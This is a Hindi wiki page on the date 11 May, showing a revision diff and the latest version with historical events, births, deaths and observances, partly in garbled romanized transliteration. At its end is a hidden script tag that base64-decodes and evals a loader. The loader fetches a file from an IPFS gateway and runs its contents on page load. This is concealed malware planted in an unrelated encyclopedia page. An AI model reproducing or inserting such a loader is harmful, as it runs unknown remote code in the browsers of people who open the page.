Difference between revisions of "11 मई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(14 intermediate revisions by 3 users not shown)
Line 4: Line 4:
  
 
==11 मई की महत्त्वपूर्ण घटनाएँ==
 
==11 मई की महत्त्वपूर्ण घटनाएँ==
* [[1995]] - संयुक्त राष्ट्र महासभा के कक्ष में 24 दिन तक चले सम्मेलन की समाप्ति पर परमाणु अप्रसार संधि को अनिश्चित काल के लिए स्थायी बना दिया गया।  
+
* [[1995]] - [[संयुक्त राष्ट्र महासभा]] के कक्ष में 24 दिन तक चले सम्मेलन की समाप्ति पर परमाणु अप्रसार संधि को अनिश्चित काल के लिए स्थायी बना दिया गया।  
* [[1998]]: [[भारत]] ने [[राजस्थान]] के [[पोकरण]] में [[तीन]] [[परमाणु]] परीक्षण किये।
+
* [[1998]]: [[भारत]] ने [[राजस्थान]] के पोखरण में तीन [[परमाणु]] परीक्षण किये।
* [[2000]] - दिल्ली के सफदरजंग अस्पताल में जन्मी 'आस्था' भारत का एक अरबवाँ बच्चा।  
+
* [[2000]] - [[दिल्ली]] के सफदरजंग अस्पताल में जन्मी 'आस्था' भारत का एक अरबवाँ बच्चा।  
* [[2001]] - संयुक्त राज्य अमेरिका की प्रक्षेपास्त्र रक्षा प्रणाली को भारत का समर्थन, अमेरिकी संसद ने संयुक्त राष्ट्र की देय राशि रोकी।  
+
* [[2001]] - [[संयुक्त राज्य अमेरिका]] की प्रक्षेपास्त्र रक्षा प्रणाली को भारत का समर्थन, अमेरिकी संसद ने संयुक्त राष्ट्र की देय राशि रोकी।  
 
* [[2002]] - बांग्लादेश में नौका दुर्घटना में 378 लोग मरे।  
 
* [[2002]] - बांग्लादेश में नौका दुर्घटना में 378 लोग मरे।  
* [[2005]] - बगलिहार परियोजना पर भारत-पाक मतभेदों को निपटाने हेतु विश्व बैंक ने तटस्थ विशेषज्ञ नियुक्त किया।  
+
* [[2005]] - [[बगलिहार परियोजना]] पर भारत-पाक मतभेदों को निपटाने हेतु विश्व बैंक ने तटस्थ विशेषज्ञ नियुक्त किया।  
 
* [[2007]] - इस्रायल ने हमास से जुड़ी रिफ़ॉर्म एवं चेंज पार्टी को गैर-क़ानूनी घोषित किया।  
 
* [[2007]] - इस्रायल ने हमास से जुड़ी रिफ़ॉर्म एवं चेंज पार्टी को गैर-क़ानूनी घोषित किया।  
 +
* [[2008]] - दक्षिणी वजीरिस्तान में नाटो सेना ने हमला किया। न्यूयार्क के कॉर्नेल विश्वविद्यालय के वैज्ञानिकों ने विश्व का पहला जिनेटिकली माडिफ़ाइड मानव भ्रूण तैयार किया।
 
* [[2010]] -  
 
* [[2010]] -  
 
** भारतीय सर्वोच्च न्यायालय के सबसे वरिष्ठ न्यायाधीश एसएच कपाड़िया को राष्ट्रपति [[प्रतिभा पाटिल]] ने 38वें प्रधान न्यायाधीश के रूप में शपथ दिलाई। वे इस पद पर 29 सितंबर 2012 तक रहेंगे।  
 
** भारतीय सर्वोच्च न्यायालय के सबसे वरिष्ठ न्यायाधीश एसएच कपाड़िया को राष्ट्रपति [[प्रतिभा पाटिल]] ने 38वें प्रधान न्यायाधीश के रूप में शपथ दिलाई। वे इस पद पर 29 सितंबर 2012 तक रहेंगे।  
 
** भारतीय सर्वोच्च न्यायालय की संवैधानिक खंड़पीठ ने एक महत्त्वपूर्ण निर्णय में कहा कि पंचायत और स्थानीय चुनाव में राज्य सरकार को आरक्षण देने का अधिकार है।
 
** भारतीय सर्वोच्च न्यायालय की संवैधानिक खंड़पीठ ने एक महत्त्वपूर्ण निर्णय में कहा कि पंचायत और स्थानीय चुनाव में राज्य सरकार को आरक्षण देने का अधिकार है।
 +
 
==11 मई को जन्मे व्यक्ति==
 
==11 मई को जन्मे व्यक्ति==
* [[1912]] - [[सआदत हसन मंटो]], कहानीकार और लेखक थे। मंटो फ़िल्म और रेडियो पटकथा लेखक और पत्रकार भी थे।  
+
* [[1957]] - [[शक्ति सिन्हा]] - भूतपूर्व भारतीय [[प्रधानमंत्री]] [[अटल बिहारी वाजपेयी]] के निजी सचिव थे।
 +
* [[1933]] - [[सागर सरहदी]] - [[हिन्दी सिनेमा|भारतीय हिन्दी सिनेमा]] के दिग्गज पटकथा लेखक थे।
 +
* [[1918]] - [[मृणालिनी साराभाई]] - [[भारत]] की प्रसिद्ध शास्त्रीय नृत्यांगना थीं।
 +
* [[1912]] - [[सआदत हसन मंटो]], कहानीकार और लेखक थे। मंटो फ़िल्म और रेडियो पटकथा लेखक और पत्रकार भी थे।
 +
* [[1904]] - [[के. वी. के. सुंदरम]] - [[भारत]] के दूसरे [[मुख्य निर्वाचन आयुक्त]] थे।
 +
* [[1903]] - [[एस. एम. श्रीनागेश]] - [[भारतीय थल सेना]] के तृतीय थल सेनाध्यक्ष थे।
 +
 
 
==11 मई को हुए निधन==
 
==11 मई को हुए निधन==
 +
* [[2002]] - [[आबिदा सुल्तान]], [[भोपाल]] सियासत की राजकुमारी एवं [[भारत]] की पहली महिला पायलट।
  
 
==11 मई के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==11 मई के महत्त्वपूर्ण अवसर एवं उत्सव==
 +
* [[राष्ट्रीय प्रौद्योगिकी दिवस]]
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==

Latest revision as of 07:54, 11 October 2021


gregori kailandar ke anusar 11 mee varsh ka 131 vaan (lip varsh mean yah 132 vaan) din hai. sal mean abhi aur 234 din shesh haian.

11 mee ki mahattvapoorn ghatanaean

  • 1995 - sanyukt rashtr mahasabha ke kaksh mean 24 din tak chale sammelan ki samapti par paramanu aprasar sandhi ko anishchit kal ke lie sthayi bana diya gaya.
  • 1998: bharat ne rajasthan ke pokharan mean tin paramanu parikshan kiye.
  • 2000 - dilli ke saphadarajang aspatal mean janmi 'astha' bharat ka ek arabavaan bachcha.
  • 2001 - sanyukt rajy amerika ki prakshepastr raksha pranali ko bharat ka samarthan, ameriki sansad ne sanyukt rashtr ki dey rashi roki.
  • 2002 - baangladesh mean nauka durghatana mean 378 log mare.
  • 2005 - bagalihar pariyojana par bharat-pak matabhedoan ko nipatane hetu vishv baiank ne tatasth visheshajn niyukt kiya.
  • 2007 - israyal ne hamas se ju di rif aaurm evan cheanj parti ko gair-qanooni ghoshit kiya.
  • 2008 - dakshini vajiristan mean nato sena ne hamala kiya. nyooyark ke k aaurnel vishvavidyalay ke vaijnanikoan ne vishv ka pahala jinetikali madifaid manav bhroon taiyar kiya.
  • 2010 -
    • bharatiy sarvochch nyayalay ke sabase varishth nyayadhish esech kapa diya ko rashtrapati pratibha patil ne 38vean pradhan nyayadhish ke roop mean shapath dilaee. ve is pad par 29 sitanbar 2012 tak raheange.
    • bharatiy sarvochch nyayalay ki sanvaidhanik khan dapith ne ek mahattvapoorn nirnay mean kaha ki panchayat aur sthaniy chunav mean rajy sarakar ko arakshan dene ka adhikar hai.

11 mee ko janme vyakti

11 mee ko hue nidhan

11 mee ke mahattvapoorn avasar evan utsav

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>